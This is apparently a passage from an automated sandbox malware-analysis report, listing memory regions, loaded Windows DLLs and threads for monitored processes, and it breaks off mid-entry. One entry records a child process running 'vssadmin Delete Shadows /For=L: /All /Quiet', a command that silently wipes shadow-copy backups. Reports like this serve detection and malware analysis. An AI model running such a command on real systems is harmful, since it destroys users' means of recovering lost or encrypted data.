	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 4443
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 4444
	        start_va = 0x1e419d10000
	          end_va = 0x1e419d1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e419d10000"
	        filename = ""

Region:
	              id = 4445
	        start_va = 0x7ff7ffac0000
	          end_va = 0x7ff7ffbbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ffac0000"
	        filename = ""

Region:
	              id = 4446
	        start_va = 0x1e419d50000
	          end_va = 0x1e419e0dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4447
	        start_va = 0x1e419ec0000
	          end_va = 0x1e419fbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419ec0000"
	        filename = ""

Region:
	              id = 4449
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 4450
	        start_va = 0x95db7a0000
	          end_va = 0x95db7dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000095db7a0000"
	        filename = ""

Region:
	              id = 4451
	        start_va = 0x1e419e10000
	          end_va = 0x1e419eaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419e10000"
	        filename = ""

Region:
	              id = 4452
	        start_va = 0x1e419d20000
	          end_va = 0x1e419d26fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419d20000"
	        filename = ""

Region:
	              id = 4454
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 4455
	        start_va = 0x1e419e10000
	          end_va = 0x1e419e10fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e419e10000"
	        filename = ""

Region:
	              id = 4456
	        start_va = 0x1e419ea0000
	          end_va = 0x1e419eaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419ea0000"
	        filename = ""

Region:
	              id = 4457
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 4458
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 4459
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 4460
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 4461
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 4465
	        start_va = 0x1e419e20000
	          end_va = 0x1e419e26fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419e20000"
	        filename = ""

Region:
	              id = 4466
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 4467
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 4468
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 4469
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 4470
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 4475
	        start_va = 0x1e419e30000
	          end_va = 0x1e419e30fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419e30000"
	        filename = ""

Region:
	              id = 4476
	        start_va = 0x1e419e40000
	          end_va = 0x1e419e40fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419e40000"
	        filename = ""

Region:
	              id = 4477
	        start_va = 0x1e419fc0000
	          end_va = 0x1e41a147fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e419fc0000"
	        filename = ""

Region:
	              id = 4478
	        start_va = 0x1e41a150000
	          end_va = 0x1e41a2d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e41a150000"
	        filename = ""

Region:
	              id = 4479
	        start_va = 0x1e41a2e0000
	          end_va = 0x1e41b6dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e41a2e0000"
	        filename = ""

Region:
	              id = 4480
	        start_va = 0x1e41b6e0000
	          end_va = 0x1e41b79ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e41b6e0000"
	        filename = ""

Region:
	              id = 4482
	        start_va = 0x95dba00000
	          end_va = 0x95dba3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000095dba00000"
	        filename = ""

Region:
	              id = 4483
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 4484
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 4506
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 4507
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 4508
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 4509
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 4510
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 4512
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 4513
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 4517
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 4518
	        start_va = 0x1e419e50000
	          end_va = 0x1e419e5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419e50000"
	        filename = ""

Region:
	              id = 4531
	        start_va = 0x1e41b7a0000
	          end_va = 0x1e41bad6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 4532
	        start_va = 0x1e419e60000
	          end_va = 0x1e419e80fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 4533
	        start_va = 0x1e41b6e0000
	          end_va = 0x1e41b739fff
	       monitored = 1
	     entry_point = 0x1e41b6f53f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 4534
	        start_va = 0x1e41b790000
	          end_va = 0x1e41b79ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e41b790000"
	        filename = ""

Region:
	              id = 4544
	        start_va = 0x1e41bae0000
	          end_va = 0x1e41bcf6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e41bae0000"
	        filename = ""

Region:
	              id = 4545
	        start_va = 0x1e41bd00000
	          end_va = 0x1e41bf10fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e41bd00000"
	        filename = ""

Region:
	              id = 4553
	        start_va = 0x1e41bf20000
	          end_va = 0x1e41c02cfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e41bf20000"
	        filename = ""

Region:
	              id = 4554
	        start_va = 0x1e41c030000
	          end_va = 0x1e41c244fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e41c030000"
	        filename = ""

Region:
	              id = 4556
	        start_va = 0x1e41c250000
	          end_va = 0x1e41c35ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e41c250000"
	        filename = ""

Region:
	              id = 4588
	        start_va = 0x95dba40000
	          end_va = 0x95dba7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000095dba40000"
	        filename = ""

Region:
	              id = 4589
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 4590
	        start_va = 0x1e419e60000
	          end_va = 0x1e419e60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e419e60000"
	        filename = ""

Region:
	              id = 4591
	        start_va = 0x1e41c360000
	          end_va = 0x1e41c41bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e41c360000"
	        filename = ""

Region:
	              id = 4592
	        start_va = 0x1e419e60000
	          end_va = 0x1e419e63fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e419e60000"
	        filename = ""

Region:
	              id = 4593
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 4602
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 4603
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 4604
	        start_va = 0x1e419e70000
	          end_va = 0x1e419e76fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e419e70000"
	        filename = ""

Region:
	              id = 4605
	        start_va = 0x1e419e80000
	          end_va = 0x1e419e80fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e419e80000"
	        filename = ""

Region:
	              id = 4606
	        start_va = 0x1e419e90000
	          end_va = 0x1e419e90fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e419e90000"
	        filename = ""

Region:
	              id = 4607
	        start_va = 0x1e419eb0000
	          end_va = 0x1e419eb4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 4608
	        start_va = 0x1e41b6e0000
	          end_va = 0x1e41b6e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 4610
	        start_va = 0x1e41b6f0000
	          end_va = 0x1e41b6f1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e41b6f0000"
	        filename = ""

Region:
	              id = 4611
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 4612
	        start_va = 0x1e41b700000
	          end_va = 0x1e41b700fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 4613
	        start_va = 0x1e41b710000
	          end_va = 0x1e41b711fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e41b710000"
	        filename = ""


Thread:
	id = 337
	os_tid = 0x1068


Thread:
	id = 338
	os_tid = 0x1064


Thread:
	id = 339
	os_tid = 0xd00


Thread:
	id = 343
	os_tid = 0x1188


Process:
	id = "60"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2ce58000"
	os_pid = "0x238"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "52"
	os_parent_pid = "0xcac"
	cmd_line = "vssadmin  Delete Shadows /For=L: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4488
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4489
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4490
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4491
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4492
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 4493
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 4494
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 4495
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 4496
	        start_va = 0x790000
	          end_va = 0x791fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000790000"
	        filename = ""

Region:
	              id = 4497
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 4498
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 4499
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4500
	        start_va = 0x7f130000
	          end_va = 0x7f152fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f130000"
	        filename = ""

Region:
	              id = 4501
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4502
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4503
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 4504
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4505
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 4511
	        start_va = 0x100000
	          end_va = 0x10ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 4514
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4515
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4516
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4525
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4529
	        start_va = 0x4880000
	          end_va = 0x4a7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 4530
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4540
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4541
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4542
	        start_va = 0x7f030000
	          end_va = 0x7f12ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f030000"
	        filename = ""

Region:
	              id = 4557
	        start_va = 0x110000
	          end_va = 0x1cdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4558
	        start_va = 0x790000
	          end_va = 0x793fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000790000"
	        filename = ""

Region:
	              id = 4559
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 4560
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4561
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 4562
	        start_va = 0x440000
	          end_va = 0x47ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 4563
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 4564
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 4565
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 4566
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 4567
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 4570
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 4571
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 4572
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 4573
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 4574
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
